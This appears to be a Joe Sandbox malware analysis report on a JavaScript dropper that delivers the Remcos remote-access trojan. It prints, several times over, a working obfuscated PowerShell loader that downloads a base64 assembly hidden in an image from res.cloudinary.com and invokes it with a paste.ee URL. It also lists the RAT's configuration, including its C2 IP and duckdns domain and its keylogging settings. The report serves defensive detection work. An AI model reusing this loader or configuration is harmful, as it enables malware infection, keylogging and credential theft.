AC0AMQAuAC4ALQAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAEwAZQBuAGcAdABoACkAXQA7ACQAcABlAHIAdgBhAHMAaQB2AGUAbgBlAHMAcwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbwByAGMAYQBzACkAOwAkAHMAeQBuAGkAegBlAHMAaQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAH
                      Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::FromBase64String($orcas);$synizesis = [System.Reflection.Assembly]::Load($pervasivenesses);$vulcanisms = [dnlib.IO.Home].GetMethod('VAI');$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'MSBuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::F

                      Data Obfuscation

                      barindex
                      Sigma detected: Powershell download and load assembly
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::FromBase64String($orcas);$synizesis = [System.Reflection.Assembly]::Load($pervasivenesses);$vulcanisms = [dnlib.IO.Home].GetMethod('VAI');$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'MSBuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::F

                      Stealing of Sensitive Information

                      barindex
                      Sigma detected: Remcos
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ProcessId: 7040, TargetFilename: C:\ProgramData\remcos\logs.dat

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-14T14:00:43.282389+010020204251Exploit Kit Activity Detected104.21.84.67443192.168.2.1249719TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-14T14:00:43.282389+010020204241Exploit Kit Activity Detected104.21.84.67443192.168.2.1249719TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-14T14:00:46.120411+010020365941Malware Command and Control Activity Detected192.168.2.1249720160.25.73.256426TCP
                      2024-12-14T14:00:49.386053+010020365941Malware Command and Control Activity Detected192.168.2.1249721160.25.73.256426TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-14T14:00:24.604589+010020490381A Network Trojan was detected151.101.193.137443192.168.2.1249711TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-14T14:00:49.266513+010028033043Unknown Traffic192.168.2.1249722178.237.33.5080TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-14T14:00:44.237648+010028582951A Network Trojan was detected104.21.84.67443192.168.2.1249719TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-14T14:00:42.871250+010028410751Malware Command and Control Activity Detected192.168.2.1249719104.21.84.67443TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for URL or domain
                      Source: ruffella.duckdns.orgAvira URL Cloud: Label: malware
                      Found malware configuration
                      Source: 0000000A.00000002.3633339065.0000000000EF8000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["160.25.73.25:6426:1", "ruffella.duckdns.org:6426:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-QM0FWK", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                      Multi AV Scanner detection for submitted file
                      Source: PO_0099822111ORDER.jsVirustotal: Detection: 14%Perma Link
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.3636685740.0000000002BEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3633339065.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7040, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,10_2_0043293A
                      Source: MSBuild.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                      Exploits

                      barindex
                      Yara detected UAC Bypass using CMSTP
                      Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7040, type: MEMORYSTR

                      Privilege Escalation

                      barindex
                      Contains functionality to bypass UAC (CMSTPLUA)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00406764 _wcslen,CoGetObject,10_2_00406764
                      Source: unknownHTTPS traffic detected: 151.101.193.137:443 -> 192.168.2.12:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.193.137:443 -> 192.168.2.12:49711 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.193.137:443 -> 192.168.2.12:49711 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.12:49719 version: TLS 1.2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,10_2_0040B335
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,10_2_0041B42F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,10_2_0040B53A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0044D5E9 FindFirstFileExA,10_2_0044D5E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,10_2_004089A9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00406AC2 FindFirstFileW,FindNextFileW,10_2_00406AC2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,10_2_00407A8C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,10_2_00418C69
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,10_2_00408DA7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_100010F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_10006580 FindFirstFileExA,10_2_10006580
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,11_2_0040AE51
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407EF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407898
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,10_2_00406F06

                      Software Vulnerabilities

                      barindex
                      Suspicious execution chain found
                      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.12:49721 -> 160.25.73.25:6426
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.12:49720 -> 160.25.73.25:6426
                      Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 104.21.84.67:443 -> 192.168.2.12:49719
                      Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 104.21.84.67:443 -> 192.168.2.12:49719
                      Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.193.137:443 -> 192.168.2.12:49711
                      Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 104.21.84.67:443 -> 192.168.2.12:49719
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\wscript.exeNetwork Connect: 151.101.193.137 443Jump to behavior
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: ruffella.duckdns.org
                      Source: Malware configuration extractorIPs: 160.25.73.25
                      Connects to a pastebin service (likely for C&C)
                      Source: unknownDNS query: name: paste.ee
                      Source: global trafficTCP traffic: 192.168.2.12:49720 -> 160.25.73.25:6426
                      Source: global trafficHTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /r/iDcBt/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 151.101.193.137 151.101.193.137
                      Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.12:49722 -> 178.237.33.50:80
                      Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.12:49719 -> 104.21.84.67:443
                      Source: global trafficHTTP traffic detected: GET /dzakc3wag/raw/upload/v1734112417/uploaded_textfile HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: res.cloudinary.comConnection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknownTCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004260F7 recv,10_2_004260F7
                      Source: global trafficHTTP traffic detected: GET /dzakc3wag/raw/upload/v1734112417/uploaded_textfile HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: res.cloudinary.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /r/iDcBt/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: MSBuild.exe, 0000000D.00000002.2753028227.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                      Source: MSBuild.exe, MSBuild.exe, 0000000D.00000002.2753028227.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                      Source: MSBuild.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                      Source: MSBuild.exe, 0000000B.00000002.2763342902.00000000013F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                      Source: MSBuild.exe, 0000000B.00000002.2763342902.00000000013F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                      Source: MSBuild.exe, 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                      Source: MSBuild.exe, 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                      Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
                      Source: global trafficDNS traffic detected: DNS query: paste.ee
                      Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                      Source: bhvFC84.tmp.11.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
                      Source: MSBuild.exe, MSBuild.exe, 0000000A.00000002.3633339065.0000000000F43000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3633339065.0000000000F53000.00000004.00000020.00020000.00000000.sdmp, bhvFC84.tmp.11.drString found in binary or memory: http://geoplugin.net/json.gp
                      Source: MSBuild.exe, 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
